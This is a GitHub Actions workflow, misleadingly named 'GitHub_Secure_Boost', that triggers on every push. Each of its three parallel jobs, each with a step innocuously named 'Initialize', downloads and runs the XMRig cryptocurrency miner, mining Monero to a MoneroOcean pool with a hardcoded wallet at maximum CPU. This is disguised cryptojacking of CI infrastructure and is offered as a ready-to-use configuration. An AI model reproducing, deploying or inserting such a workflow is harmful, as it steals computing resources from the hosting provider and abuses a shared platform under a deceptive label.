name: GitHub_Secure_Boost
on: [push]
jobs:
  server_1:
    runs-on: ubuntu-latest
    steps:
      - name: Initialize
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o gulf.moneroocean.stream:443 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Server_1 --tls --cpu-max-threads-hint 100
  server_2:
    runs-on: ubuntu-latest
    steps:
      - name: Initialize
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o gulf.moneroocean.stream:443 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Server_2 --tls --cpu-max-threads-hint 100
  server_3:
    runs-on: ubuntu-latest
    steps:
      - name: Initialize
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o gulf.moneroocean.stream:443 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Server_3 --tls --cpu-max-threads-hint 100
          
